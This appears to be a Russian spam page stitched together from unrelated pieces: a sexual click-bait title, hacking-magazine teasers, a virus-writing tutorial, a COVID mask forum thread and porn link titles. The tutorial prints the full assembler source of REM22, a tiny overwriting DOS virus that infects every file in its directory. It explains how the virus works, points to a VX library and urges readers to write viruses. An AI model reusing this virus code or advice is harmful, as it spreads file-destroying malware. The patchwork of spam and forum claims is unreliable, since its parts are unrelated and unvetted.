На улице вирус давай просто трахаться дома

⚡ ПОДРОБНЕЕ ЖМИТЕ ЗДЕСЬ 👈🏻👈🏻👈🏻

На улице вирус давай просто трахаться дома

Временная скидка 60% на годовую подписку !
Инструменты: W32Dasm v 8.93, SoftIce v 4.x (или) Spy++. Всем нравится трепаться по Асе и …
Сегодня мы зарегистрируем программу CDRWin 4.0. Анализировать будем файл cdrwin.exe размер…
В статье об SNMP было упомянуто понятие маскарадинга. После данной статьи в мой ящик прих…
SQL сервер использует недокументированную функцию pwdencrypt() для создания хешей пользова…
Единственная цель этой статьи - получение дополнительных знаний, которые помогут начинающи…
Рассмотрим сущность перекрывающегося кода и применим его для защиты нашей программы. …
Ну вот я снова развернул клаву и строчу текст .. итак, что же ждёт юного хакера в этот раз…
В виде преамбулы хочу сказать, что сам я не претендую на звание супер крутого админа всех …
Привет тебе, начинающий Перл-кодер. Perl язык старый, но проверенный и надежный, однако не…
Итак, юные хакеры, сейчас я проведу небольшой ликбез, который поможет вам расширить и углу…
Клинское Party Zone 2001. Конец марта. В конце марта очередная тусовка из серии Клинское P…


новых последующих комментариях
новых ответах на мои комментарии


Пожалуйста, войдите, чтобы прокомментировать

Новые
Популярные

Сайт защищен Qrator — самой забойной защитой от DDoS в мире

Подписка для физлиц
Подписка для юрлиц
Реклама на «Хакере»

Контакты

"Он долго куда-то ехал в неудобной жесткой упаковке, его трясло и укачивало, тело требовало пищи. Он не понимал, почему его, только-только появившегося на свет, вышвырнули из дома... Наконец тряска прекратилась, и кто-то чужой и грубый вскрыл приаттаченный к письму архив. Молодой, любопытный вирус высунулся наружу и совершил свое первое деление..."
В этой статье я поделюсь опытом вирусописания. Основной принцип деятельности любого вируса можно выразить в нескольких словах: тело вируса во время его выполнения трактуется, как код, а во время заражения, как данные. Существует много типов вирусов и различных способов заражения. Естественно, сам механизм действий вируса зависит от конкретной операционной системы. Есть, например, вирусы, работающие в защищенном режиме процессора (режим максимальных
привилегий и абсолютной адресации всей памяти). На лечение таких экземпляров таким компаниям, как AVP, приходится тратить очень много времени и ресурсов. Единственное, что спасает создателей антивирусов - очень малое число реально профессиональных вирусов. 
Для того, чтобы научиться самому писать вирусы необходимо лишь знание основ ассемблера. Я имею в виду, что при начальных знаниях ты можешь пробовать писать собственные вирусы и исследовать уже существующие. Другие полезные, а порой необходимые,
знания придут по мере твоего изучения чужих творений. Из ресурсов по этой теме могу посоветовать страничку, содержащую огромное количество книг и статей:
http://vx.netlux.org/lib_rus.shtml .
Все ее документы написаны на очень понятном и доступном 
языке. Так же существует известный электронный журнал Infected Voice. В нем есть удобная система навигации, позволяющая ориентироваться в новых материалах (исходниках и статьях). Этот журнал выходит раз в пол года (по крайней мере так было раньше, сейчас не уверен) и содержит все нововведения в этой области.
Предположим ты нашел исходник какого-либо вируса и хочешь его исследовать. Как это сделать? Честно говоря, я сам столкнулся с такой проблемой в самый первый раз. У меня вопрос стал так: есть текст вируса, хочу посмотреть, как он работает, и при этом Я ЕГО БОЮСЬ! Это полностью реально: что помешает этому вирусы спалить мой CMOS или потереть мой винт? Ответ: ничто. При твоих неправильных действиях вирус может причинить тебе тот вред, на который запрограммирован. Однако, алгоритм правильных действий достаточно прост. Сейчас мы в нем и разберемся.
Будем считать, что исходник вируса написан на ассемблере. Этот язык идеально подходит для написания вирусов. Как известно, в
ассемблере есть только две команды вызывающие "реальные" (имеются в виду действия, способные произвести
необратимые изменения на жестком диске или еще где-нибудь) это "INT" и "OUT", все остальные команды работают с регистрами процессора и флагами (хоть и достаточно грубо, но по большому счету верно). Мы не рассматриваем функции WIN API, так как их в принципе можно считать заменой прерываний DOS, а их вызов - заменой команды
"INT".
Небольшая справка для новичков или давно не писавших на асме: команда "INT" служит для вызова прерываний DOS или BIOS, а команда "OUT" для записи данных в порт. При этом для команды "INT" номер функции указывается в регистре AH (чаще всего), а
для команды "OUT" в регистрах AL, AX, EAX хранятся данные, записываемые в порт.
Итак. Возьми любой отладчик. Так как для начала нужно разбираться в вирусах под DOS (они по-прежнему работают и под
Win), то подойдет любой отладчик: Turbo Debugger от Borland Inc., CodeView от MicroSoft, AFDPRO или AVPUTIL. Далее, загрузи исходник в отладчик и пошагово трассируйте. Главное придерживаться ТОЛЬКО ОДНОГО ПРАВИЛА. Его можно назвать золотым.
ВНИМАНИЕ: ты можешь смело выполнять исходный код твоего вируса, но как только ты дойдешь до команд "OUT" или "INT" сразу останавливайся и начинай анализ.
Для того, чтобы разобраться с реальными действиями этих команд используй либо Tech Help, либо любую доку по асму, либо любую
книгу. Главное, чтобы в твоем источнике можно было найти инфу по всем прерываниям и портам.
Таким образом, ты можешь понять, что будет делать
следующая команда, не выполнив ее у себя на компьютере. Во время трассировки, записывай все данные (состояние регистров, адреса команд, данные о
вызываемых функциях и т.д. ) на листочек бумаги. Тогда к моменту вызова функции (или записи в порт) ты будешь во всеоружии и сможешь определить, что произойдет, если ты выполнишь следующую команду. Так же это поможет тебе при сравнительном анализе изменений в регистрах и флагах. 
После того, как ты поймешь, что делает та или иная команда ("INT" или "OUT"), пропусти ее и иди дальше, пока не
встретишь конец файла или следующую такую команду. В результате ты разложишь любой вирус по полочкам и разберешься в его функционировании.
Давай рассмотрим пример. В качестве оного я взял небольшой вирус, написанный неким Reminder'ом. Я достал его из одиннадцатого номера Infected Voice'а. Там он был без комментариев, так что всю работу пришлось проделать самому. Что меня
привлекло в этом творении: очень маленький исходный код, очень маленький размер откомпилированного экзешника, непонятный (на первый взгляд) алгоритм. Вот его исходный код (кстати, называется он REM22):
.model tiny
.code
.startup
start:
pop cx
hel:
xchg ax,bx
db 108h shr 1
db 4eh ; dec si
db 9eh shr 1
db 3ch ;cmp al,xx
db 100h shr 1
db 40h
fmask db '*.*',0
lodsw
cwd
mov dl,al
shl dx,1
int 21h
jmp hel
end
Этот вирус на мой взгляд является шедевром, так как при таком маленьком размере
организовать механизм размножения - работа по истине гения. Когда мы сейчас разберем, что и как он делает, все
станет на свои места. А пока надо заметить: в принципе, этот вирус не несет каких-либо деструктивных действий (думаю, размножение нельзя считать таковым), однако заражает все файлы
в одном с ним каталоге. Он не является "профессиональным" вирусом, то есть в нем отсутствуют многие механизмы, характерные для серьезных творений:
То есть его можно считать - оверрайтером (программой перезаписывающей что-либо). Но на его примере очень просто проиллюстрировать механизм размножения (да еще такой гибкий).
Давай заглянем к внутрь нашего
оверрайетера. Исходник представляет из себя модель для создания exe-файла. ".startup" это директива TASM'а, без нее можно обойтись, но тогда придется писать "org 100h", а потом ставить метку (и
в конце, после "end", ставить имя метки). Остальные команды можно без проблем найти в любой книжке и посмотреть, что они делают (не ленись). Осталось только разобраться, что делают эти команды вместе в совокупности.
Данный шедевр - это обыкновенный цикл, который повторяется 6 раз. Что же происходит в цикле? А происходит то, что мы вызываем int 21h с шестью разными функциями (93, 4E, 3C, 40, 2E, 00). Смотрим
по порядку, значит:
"pop cx" - это только для обнуления сх (в вершине стека, как ты знаешь, вначале проги лежит зеро). Зачем? А чтобы на команде SUB CH,[2Ah] (поищи, оно должно быть по смещению 108h в дебаггере) получить CH=01 (по смещению 2Ah (это в PSP где-то) всегда лежит FFh), т.е. можно не выпендриваться и просто написать sub ch,ffh, но это изменит код проги... Получается:
*.*,0 = sub CH,[2Ah], а это уже готовая маска для поиска... ВОТ ГДЕ ГЕНИАЛЬНОСТЬ!!!
То есть sub ch,ffh - это "Aе " (в ASCII кодах с пробелом в конце). Дальше, все что идет со смещения 101 (code 93) до смещения 10B (code 00) - это ФУНКЦИИ ДЛЯ int 21h!!! Т.е. это 6 функций, которые мы по очереди вызываем в цикле (см. выше их номера), а код, который при этом получается - это просто мишура. Это не имеет АБСОЛЮТНО НИКАКОГО СМЫСЛА! ТАК ПОЛУЧИЛОСЬ, ЕСЛИ СОБРАТЬ ФУНКЦИИ ПОДРЯД. То есть, если я напишу TANAT, то это переведется в последовательность каких-то команд, ведь так? Но это по сути данные... хотя в данной проге - это и данными не назовешь, это просто ФУНКЦИИ для int 21h, вот в чем
ГЕНИАЛЬНОСТЬ!!! Дальше рассказывать смысла нет - потому как в каждом из шести циклов происходит вызов функции, ну и все регистры приблизительно
подогнаны под идеалы... Смотри: 
-в первый раз вызывается 93h функция: Pipe (Error) - она для самой проги НЕ ВЫПОЛНЯЕТ НИКАКОЙ НАГРУЗКИ, НИЧЕГО ПОЛЕЗНОГО НЕ ДЕЛАЕТ, ЭТО ПРОСТО ИЗЛИШЕК, ОНА НЕ НУЖНА, ЭТО ЛИШНИЙ ЦИКЛ, НО УЧИТЫВАЯ гениальность кода, она просто ВОЗНИКАЕТ САМА ПО СЕБЕ И ОТ НЕЕ НИКУДА НЕ ДЕНЕШЬСЯ!!! Будет еще одна такая "левая" функция - см. дальше.
-вторая: 4Eh - вот это уже то, что надо! Поиск файла, причем к моменту вызова в dx находится смещение маски файла (108h)!!!
-третья: 3Ch - создание файла. Это еще одна "левая" функция. Она нам ни к чему. Нам незачем создавать файл (ведь мы должны только записать себя в тот файл, что нашли в предыдущем шаге). В DX лежит какой-то левый мусор, естественно с
именем файла ничего общего не имеет, поэтому CF=1 и мы переходим на следующий цикл.
-четвертая: 40h - Запись в файл. А вот это то, что нам надо уже! DX содержит смещение 100h (т.е. начало REM22), а вот CX немного подвел - он равен 400h, т.е. реально в начало найденного файла
запишется 400h байт, тогда как REM22 занимает всего 22 байта, т.е. запишется 1002 лишних байта. Это так. Но учитывая гениальность кода :), это можно простить.
-пятая: 2Eh - Set Verify Flag. Это САМАЯ ЛЕВАЯ функция, тут она просто - аппендикс проги. 
-шестая: 00h - это оказывается выход из проги (я тоже не знал).
Вот и все: то есть мы имеем 6 циклов, из которых смысловых только 3: поиск, запись и выход.
Скорее всего тебе будет очень многое не
поянтно. Чтобы разобраться, загрузи исходник в отладчик, потрассируй его, посмотри
на состояние данные в регистрах, посмотри на мои комментарии. Тогда все станет ясно. В заключение
привожу отладочную таблицу, чтоб ты не составлял ее сам (за одно и посмотришь, как она должна выглядеть). В принципе ее одной должно хватить,
для понимания того, что происходит в этом вирусе, но, думаю, комментарии будут не лишними.
Криптовалютная биржа Gemini предупреждает, что ее клиенты становятся жертвами фишинговых а…
Почему здесь не разу не затронули тему сценеров , те кто пишет кряки и маскирует вирусы в них 64 к . Слышал это особый разряд хакеров . Олдскльных. Я смотрел видео на ютюб где открывали истиную сторону пиратских программ в торрент. Взломанные с помощью кряков и прочего они вшивают туда … Подробнее »

Носить маску на улице - это бессмысленно?
😄 😃 😀 😊 😉 😍 😘 😚 😗 😙 😜 😝 😛 😳 😁 😔 😌 😒 😞 😣 😢 😂 😭 😪 😥 😰 😅 😓 😩 😫 😨 😱 😠 😡 😤 😖 😆 😋 😷 😎 😴 😵 😲 😟 😦 😧 👿 😮 😬 😐 😕 😯 😏 😑 👲 👳 👮 👷 💂 👶 👦 👧 👨 👩 👴 👵 👱 👼 👸 😺 😸 😻 😽 😼 🙀 😿 😹 😾 👹 👺 🙈 🙉 🙊 💀 👽 💩 🔥 ✨ 🌟 💫 💥 💢 💦 💧 💤 💨 👂 👀 👃 👅 👄 👍 👎 👌 👊 ✊ 👋 ✋ 👐 👆 👇 👉 👈 🙌 🙏 👏 💪 🚶 🏃 💃 👫 👪 💏 💑 👯 🙆 🙅 💁 🙋 💆 💇 💅 👰 🙎 🙍 🙇 🎩 👑 👒 👟 👞 👡 👠 👢 👕 👔 👚 👗 🎽 👖 👘 👙 💼 👜 👝 👛 👓 🎀 🌂 💄 💛 💙 💜 💚 💔 💗 💓 💕 💖 💞 💘 💌 💋 💍 💎 👤 💬 👣
🐶 🐺 🐱 🐭 🐹 🐰 🐸 🐯 🐨 🐻 🐷 🐽 🐮 🐗 🐵 🐒 🐴 🐑 🐘 🐼 🐧 🐦 🐤 🐥 🐣 🐔 🐍 🐢 🐛 🐝 🐜 🐞 🐌 🐙 🐚 🐠 🐟 🐬 🐳 🐎 🐲 🐡 🐫 🐩 🐾 💐 🌸 🌷 🍀 🌹 🌻 🌺 🍁 🍃 🍂 🌿 🌾 🍄 🌵 🌴 🌰 🌱 🌼 🌑 🌓 🌔 🌕 🌛 🌙 🌏 🌋 🌌 🌠 ⛅ ⛄ 🌀 🌁 🌈 🌊
🎍 💝 🎎 🎒 🎓 🎏 🎆 🎇 🎐 🎑 🎃 👻 🎅 🎄 🎁 🎋 🎉 🎊 🎈 🎌 🔮 🎥 📷 📹 📼 💿 📀 💽 💾 💻 📱 📞 📟 📠 📡 📺 📻 🔊 🔔 📢 📣 ⏳ ⌛ ⏰ ⌚ 🔓 🔒 🔏 🔐 🔑 🔎 💡 🔦 🔌 🔋 🔍 🛀 🚽 🔧 🔩 🔨 🚪 🚬 💣 🔫 🔪 💊 💉 💰 💴 💵 💳 💸 📲 📧 📥 📤 📩 📨 📫 📪 📮 📦 📝 📄 📃 📑 📊 📈 📉 📜 📋 📅 📆 📇 📁 📂 📌 📎 📏 📐 📕 📗 📘 📙 📓 📔 📒 📚 📖 🔖 📛 📰 🎨 🎬 🎤 🎧 🎼 🎵 🎶 🎹 🎻 🎺 🎷 🎸 👾 🎮 🃏 🎴 🀄 🎲 🎯 🏈 🏀 ⚽ ⚾ 🎾 🎱 🎳 ⛳ 🏁 🏆 🎿 🏂 🏊 🏄 🎣 🍵 🍶 🍺 🍻 🍸 🍹 🍷 🍴 🍕 🍔 🍟 🍗 🍖 🍝 🍛 🍤 🍱 🍣 🍥 🍙 🍘 🍚 🍜 🍲 🍢 🍡 🍳 🍞 🍩 🍮 🍦 🍨 🍧 🎂 🍰 🍪 🍫 🍬 🍭 🍯 🍎 🍏 🍊 🍒 🍇 🍉 🍓 🍑 🍈 🍌 🍍 🍠 🍆 🍅 🌽
🏠 🏡 🏫 🏢 🏣 🏥 🏦 🏪 🏩 🏨 💒 ⛪ 🏬 🌇 🌆 🏯 🏰 ⛺ 🏭 🗼 🗾 🗻 🌄 🌅 🌃 🗽 🌉 🎠 🎡 ⛲ 🎢 🚢 ⛵ 🚤 🚀 💺 🚉 🚄 🚅 🚇 🚃 🚌 🚙 🚗 🚕 🚚 🚨 🚓 🚒 🚑 🚲 💈 🚏 🎫 🚥 🚧 🔰 ⛽ 🏮 🎰 🗿 🎪 🎭 📍 🚩

Последний —

02 апреля 2020, 16:02
Перейти

Разводимся с мужем из за коронавируса!
Обычная история неизбежного краха семьи
Как бы вы отреагировали, если бы увидели на улице девушку в маске?
Что можно добавить к антибиотикам при ХП?
Кто сталкивался с артрозом коленных суставов?
Популярные темы за неделю: 66 949 тем
Кто сталкивался с артрозом коленных суставов?
Что можно добавить к антибиотикам при ХП?
Коронавирус и общественный транспорт
Отношения

Мужчина и женщина


Дружба


Секс


Семья


Родители



Я и общество

Социальная жизнь


Образование


Работа


Финансы



Здоровье

Женское здоровье


Стоматология


Психология


Беременность


Диеты и ЗОЖ



Дети

Малыши


Дети от 3 до 6 лет


Дети от 7 до 12 лет


Подростки


Детское питание


Здоровье и развитие


Детские сады и школы


Имена


Детские пособия



Дом

Хозяйство


Рецепты


Интерьер


Мои питомцы



Красота

Лицо


Тело


Волосы


Ногти


Пластика и косметология



Развлечения

Время для себя


Искусство


Путешествия


Праздники и подарки


Проба пера


Будем знакомы



Жизнь форума

Форумчане о форумчанах


Общение с модераторами


Блог форума


Развлекательный портал



Нужно ли носить маску на улице? То что в закрытом помещении она нужна, это ок. А на улице? Ведь вирус не летает по воздуху с листьями как в фильме "Птичий короб", вирусняк передается воздушно-капельным путем от чела к челу. Так зачем нацеплять маску в открытом пространстве, где на рассточнии нескольких метров людей нет, в результате на улице маска намокает , а уже в помещении она влажная и никакого препятствия для вируса не имеет, становится бесполезным намордником. #Коронавирус (covid-19)
Если один на улице, то не нужно. А если по городской улице идете, где есть прохожие, то лучше быть в маске.Но лучше носить маску с клапаном, чтобы влага испарялась.
Маска нужна чихающим и кашляющим, чтобы бактерии и вирусы не разлетались. А как защита маска не поможет, нужно носить спец маски с клапаном, плотно прилегающие к лицу и очки защитные
маска помогает нам не трогать лицо руками, на которых может быть вирус.
Этот вирус передается не только по воздуху. Он передается от зараженного человека и через мазок. Поэтому надо носить маски и перчатки в помещении и среди людей.
Маска нужна чихающим и кашляющим, чтобы бактерии и вирусы не разлетались. А как защита маска не поможет, нужно носить спец маски с клапаном, плотно прилегающие к лицу и очки защитные
Нет, оказывается даже обычная хирургическая маска до 80% частиц задерживает (рассказывал врач инфекционной больницы), так что она не бесполезна.
Чтобы не чихать и не кашлять на окружающих. Это если маска обычная. Как этикет.
При этом глаза не защищены) А также грязные руки, которыми снимают маску четко под носом. Глупость эти маски
Симпотная шлюшка в голубых трусиках
Старухи с большими сиськами фото
Голые секси девчонки фото